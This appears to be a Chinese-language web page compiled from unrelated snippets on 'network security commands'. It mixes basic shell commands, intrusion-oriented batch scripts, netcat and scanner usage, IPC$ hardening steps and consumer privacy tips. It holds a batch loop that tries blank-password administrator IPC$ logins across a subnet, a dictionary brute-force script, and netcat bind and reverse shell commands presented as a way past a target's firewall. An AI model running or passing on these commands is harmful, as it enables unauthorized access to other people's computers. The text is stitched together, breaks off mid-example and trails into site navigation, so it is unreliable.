mv 移動文件
rm 文件名刪除文件，rm -a 目錄名刪除目錄及子目錄
mkdir 目錄名建立目錄
rmdir 刪除子目錄，目錄內沒有文檔。
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date 現在的日期、時間
who 查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami 查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su 許可權轉換為指定使用者
telnet IP telnet連接對方主機（同win2K），當出現bash$時就說明連接成功。
ftp ftp連接上某伺服器（同win2K）

附：批處理命令與變數

1：for命令及變數基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters] %variable:指定一個單一字母可替換的參數，如：%i ，而指定一個變數則用：%%i ，而調用變數時用：%i% ，變數是區分大小寫的（%i 不等於 %I）。
批處理每次能處理的變數從%0-%9共10個，其中%0默認給批處理文件名使用，%1默認為使用此批處理時輸入的的第一個值，同理：%2-%9指輸入的第2-9個值；例：net use \\ip\ipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{ 「(1 1 254)」第一個"1"指起始值，第二個"1"指增長量，第三個"254"指結束值，即：從1到254；「(1 -1 254)」說明：即從254到1 }

command：指定對第個文件執行的命令，如：net use命令；如要執行多個命令時，命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{ (set)為增量形式時 }；/F 指從文件中不斷取值，直到取完為止{ (set)為文件時，如(d:\pass.txt)時 }。
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \\%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接，如果成功就把該IP存在test.txt中。

/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的最後一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$後，在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值，增長量，結止值。
@echo off
echo 用法格式：ok.bat ip
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
存為：ok.exe 說明：輸入一個IP後，用字典文件d:\pass.dic來暴解d:\user.dic中的用戶密碼，直到文件中值取完為止。%%i為用戶名；%1為輸入的IP地址（默認）。

#7 七：

2：if命令及變數基本格式：
IF [not] errorlevel 數字命令語句如果程序運行最後返回一個等於或大於指定數字的退出編碼，指定條件為「真」。
例：IF errorlevel 0 命令指程序執行後返回的值為0時，就值行後面的命令；IF not errorlevel 1 命令指程序執行最後返回的值不等於1，就執行後面的命令。
0 指發現並成功執行（真）；1 指沒有發現、沒執行（假）。
IF [not] 字元串1==字元串2 命令語句如果指定的文本字元串匹配（即：字元串1 等於字元串2），就執行後面的命令。
例：「if "%2%"=="4" goto start」指：如果輸入的第二個變數為4時，執行後面的命令（注意：調用變數時就%變數名%並加" "）
IF [not] exist 文件名命令語句如果指定的文件名存在，就執行後面的命令。
例：「if not nc.exe goto end」指：如果沒有發現nc.exe文件就跳到":end"標簽處。
IF [not] errorlevel 數字命令語句 else 命令語句或 IF [not] 字元串1==字元串2 命令語句 else 命令語句或 IF [not] exist 文件名命令語句 else 命令語句加上：else 命令語句後指：當前面的條件不成立時，就指行else後面的命令。注意：else 必須與 if 在同一行才有效。當有del命令時需把del命令全部內容用< >括起來，因為del命令要單獨一行時才能執行，用上< >後就等於是單獨一行了；例如：「if exist test.txt. <del test.txt.> else echo test.txt.missing 」，注意命令中的「.」

（二）系統外部命令(均需下載相關工具)：

1、瑞士軍刀：nc.exe

參數說明：
-h 查看幫助信息
-d 後台模式
-e prog程序重定向，一但連接就執行〔危險〕
-i secs延時的間隔
-l 監聽模式，用於入站連接
-L 監聽模式，連接天閉後仍然繼續監聽，直到CTR+C
-n IP地址，不能用域名
-o film記錄16進制的傳輸
-p[空格]埠本地埠號
-r 隨機本地及遠程埠
-t 使用Telnet交互方式
-u UDP模式
-v 詳細輸出，用-vv將更詳細
-w數字 timeout延時間隔
-z 將輸入，輸出關掉（用於掃錨時）
基本用法：
nc -nvv 192.168.0.1 80 連接到192.168.0.1主機的80埠
nc -l -p 80 開啟本機的TCP 80埠並監聽
nc -nvv -w2 -z 192.168.0.1 80-1024 掃錨192.168.0.1的80-1024埠
nc -l -p 5354 -t -e c:winntsystem32cmd.exe 綁定remote主機的cmdshell在remote的TCP 5354埠
nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主機的cmdshell並反向連接192.168.0.2的5354埠
高級用法：
nc -L -p 80 作為蜜罐用1：開啟並不停地監聽80埠，直到CTR+C為止
nc -L -p 80 > c:\log.txt 作為蜜罐用2：開啟並不停地監聽80埠，直到CTR+C,同時把結果輸出到c:\log.txt
nc -L -p 80 < c:\honeyport.txt 作為蜜罐用3-1：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中，亦可起到傳送文件作用
type.exe c:\honeyport | nc -L -p 80 作為蜜罐用3-2：開啟並不停地監聽80埠，直到CTR+C,並把c:\honeyport.txt中內容送入管道中,亦可起到傳送文件作用
本機上用：nc -l -p 本機埠
在對方主機上用：nc -e cmd.exe 本機IP -p 本機埠 *win2K
nc -e /bin/sh 本機IP -p 本機埠 *linux,unix 反向連接突破對方主機的防火牆
本機上用：nc -d -l -p 本機埠 < 要傳送的文件路徑及名稱
在對方主機上用：nc -vv 本機IP 本機埠 > 存放文件的路徑及名稱傳送文件到對方主機
備註：
| 管道命令
< 或 > 重定向命令。「<」，例如：tlntadmn < test.txt 指把test.txt的內容賦值給tlntadmn命令
＠表示執行＠後面的命令，但不會顯示出來（後台執行）；例：＠dir c:\winnt >> d:\log.txt 意思是：後台執行dir，並把結果存在d:\log.txt中
>與>>的區別 ">"指：覆蓋；">>"指：保存到(添加到）。
如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二個命令分別執行二次比較看：用>>的則是把二次的結果都保存了，而用：>則只有一次的結果，是因為第二次的結果把第一次的覆蓋了。

#8 八：

2、掃錨工具：xscan.exe

基本格式
xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項] 掃錨"起始IP到終止IP"段的所有主機信息
xscan -file <主機列表文件名> <檢測項目> [其他選項] 掃錨"主機IP列表文件名"中的所有主機信息
檢測項目
-active 檢測主機是否存活
-os 檢測遠程操作系統類型（通過NETBIOS和SNMP協議）
-port 檢測常用服務的埠狀態
-ftp 檢測FTP弱口令
-pub 檢測FTP服務匿名用戶寫許可權
-pop3 檢測POP3-Server弱口令
-smtp 檢測SMTP-Server漏洞
-sql 檢測SQL-Server弱口令
-smb 檢測NT-Server弱口令
-iis 檢測IIS編碼/解碼漏洞
-cgi 檢測CGI漏洞
-nasl 載入Nessus攻擊腳本
-all 檢測以上所有項目
其它選項
-i 適配器編號設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l 顯示所有網路適配器
-v 顯示詳細掃描進度
-p 跳過沒有響應的主機
-o 跳過沒有檢測到開放埠的主機
-t 並發線程數量,並發主機數量指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log 文件名指定掃描報告文件名 (後綴為：TXT或HTML格式的文件)
用法示例
xscan -host 192.168.1.1-192.168.255.255 -all -active -p 檢測192.168.1.1-192.168.255.255網段內主機的所有漏洞，跳過無響應的主機
xscan -host 192.168.1.1-192.168.255.255 -port -smb -t 150 -o 檢測192.168.1.1-192.168.255.255網段內主機的標准埠狀態，NT弱口令用戶，最大並發線程數量為150，跳過沒有檢測到開放埠的主機
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態，CGI漏洞，最大並發線程數量為200，同一時刻最多檢測5台主機，顯示詳細檢測進度，跳過沒有檢測到開放埠的主機

#9 九：

3、命令行方式嗅探器: xsniff.exe
可捕獲區域網內FTP/SMTP/POP3/HTTP協議密碼
參數說明
-tcp 輸出TCP數據報
-udp 輸出UDP數據報
-icmp 輸出ICMP數據報
-pass 過濾密碼信息
-hide 後台運行
-host 解析主機名
-addr IP地址過濾IP地址
-port 埠過濾埠
-log 文件名將輸出保存到文件
-asc 以ASCII形式輸出
-hex 以16進制形式輸出
用法示例
xsniff.exe

6. 信息與網路安全管理自考題中ping程序是在哪一節

系列一。
ping 命令是網路管理人員最常使用的命令，它用於診斷網路連接故障，主要是終端到路由器、路由器到DNS伺服器之間的連接狀態。當然它也是入侵者常用的網路命令，目的就是通過發送特定形式的ICMP包（簡單網路管理協議）來請求主機的回應，進而獲得主機的一些屬性，它可以試探目標主機是否活動，查詢目標主機的機器名，可以配合ARP命令查詢目標主機MAC地址，甚至可以推斷目標主機操作系統，還有就是可以進行DDoS攻擊。
一、ping命令使用格式：ping [ - t] [ - a] [ - n count] [ - l size] [ - f] [ - i TTL] [ - v TOS] [ - r count] [ - s count] [[ - j host - list] | [ - k host - list]] [ - w timeout] target_name，其主要參數說明。-t：一直ping下去，可使用Ctrl+C終止；-a： ping的同時將IP地址轉化為主機名如ping -a 127.0.0.1。

7. 計算機網路安全

TCSEC 把計算安全劃分為四個等級：A,B,C,D 七個級別：A1,B1,B2,B3,C1,C2,D1.如果所謂的系統是操作系統的話，現在大部分都是C級

用戶名：1234
密碼：abcd

net start telnet 開啟TELNET服務
net stop telnet 停止TELNET服務

IDS出現的失誤有：正誤判，負誤判，失控判斷

建立空鏈接的命令是：
net use \\192.168.10.10\ipc$ "用戶名" /user:"密碼"�

刪除空鏈接命令是：
net use \\192.168.10.10\ipc$ /del

IPC$空鏈接防範：
1禁止空連接進行枚舉，運行regedit，找到如下組建

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的鍵值改為：00000001

2禁止默認共享
1）察看本地共享資源
運行-cmd-輸入net share
2）刪除共享(每次輸入一個）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,......可以繼續刪除）
3）停止server服務
net stop server /y （重新啟動後server服務會重新開啟）
4）修改注冊表
運行-regedit
server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的鍵值改為:00000000。
pro版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的鍵值改為:00000000。
如果上面所說的主鍵不存在，就新建(右擊-新建-雙位元組值）一個主健再改鍵值。
3永久關閉ipc$和默認共享依賴的服務:lanmanserver即server服務
控制面板-管理工具-服務-找到server服務（右擊）-屬性-常規-啟動類型-已禁用
4安裝防火牆(選中相關設置)，或者埠過濾(濾掉139,445等),或者用新版本的優化大師
5設置復雜密碼，防止通過ipc$窮舉密碼

8. 如何有效的防止網路的安全

你如果是用是WINdows系統的話，我建議你先把系統默認的C$
D$
admin$
給關掉。
只留一個IPC$
這些的隱藏的共享你可以在CMD中看到。點開始--運行--cmd--enter--cd\--net
share
你就可以看到了這些共享的盤符。這些都是微軟為了便於PC的管理而設置的。你可以CMD
里刪除。。。。命令是這樣滴：cmd---cd\---net
share
c$ /del-----enter-----OK
了
其他的以同樣的方式刪除。。。。。這樣就會防止別人IPC攻擊了。

9. 關於網路安全知識內容

那麼首先關於網路安全知識的內容有哪些？

NO.1如何避免電腦被安裝木馬程序？

安裝殺毒軟體和個人防火牆，並及時升級；可以考慮使用安全性比較好的瀏覽器和電子郵件客戶端工具；不要執行任何來歷不明的軟體；對陌生郵件要殺毒後，再下載郵件中的附件；經常升級系統和更新病毒庫；非必要的網站插件不要安裝；定期使用殺毒軟體查殺電腦病毒。

NO.2日常生活中如何保護個人信息？

不要在社交網站類軟體上發布火車票、飛機票、護照、照片、日程、行蹤等；在圖書館、列印店等公共場合，或是使用他人手機登錄賬號，不要選擇自動保存密碼，離開時記得退出賬號；從常用應用商店下載APP,不從陌生、不知名應用商店、網站頁面下載APP;填寫調查問卷、掃二維碼注冊盡可能不使用真實個人信息。

NO.3預防個人信息泄露需要注意什麼？

需要增強個人信息安全意識，不要輕易將個人信息提供給無關人員；妥善處置快遞單、車票、購物小票等包含個人信息的單據；個人電子郵箱、網路支付及銀行卡等密碼要有差異。

NO.4收快遞時如何避免個人信息泄露？

因為個人信息都在快遞單上，不管是快遞盒直接放入垃圾桶還是把快遞單撕下來在放進干垃圾分類中都有可能泄露個人信息，因此收快遞時要撕毀快遞箱上的面單。

NO.5注冊時可以使用個人信息（名字、出生年月等）作為電子郵箱地址或用戶名嗎？

在注冊時，盡可能不使用個人信息（名字、出生年月等）作為電子郵箱地址或是用戶名，容易被撞庫破解。

NO.6在網上進行用戶注冊，設置用戶密碼時應當注意什麼？

連續數字或字母、自己或父母生日都是容易被猜到或獲取的信息，因此如果使用生日作為密碼風險很大。而如果所有賬號都使用一種密碼，一旦密碼丟失則容易造成更大損失。因此涉及財產、支付類賬戶的密碼應採用高強度密碼。

NO.7如何防止瀏覽行為被追蹤？

可以通過清除瀏覽器Cookie或者拒絕Cookie等方式防止瀏覽行為被追蹤。

NO.8在安裝新的APP時，彈窗提示隱私政策後，需要注意什麼？

在安全網站瀏覽資訊；對陌生郵件要殺毒後，再下載郵件中的附件；下載資源時，優先考慮安全性較高的綠色網站。

NO.9現在游戲都設置了未成年人防沉迷機制，通常需要用戶進行實名認證，填寫實名信息過程，需要注意什麼？

有一些游戲會過度收集個人信息，如：家庭地址、身份證照片、手機號等，仔細閱讀實名信息，僅填寫必要實名信息，不能為了游戲體驗而至個人信息安於不顧。

以上就是我所說的關於網路安全知識的一些利潤概要。

10. cmd攻擊別人電腦命令，

無法攻擊別人電腦，但是可以訪問別人電腦。

如下參考：

1.在桌面上,單擊「開始」,單擊「運行」。

導航:首頁 > 程序命令 > 網路安全命令

網路安全命令

與網路安全命令相關的資料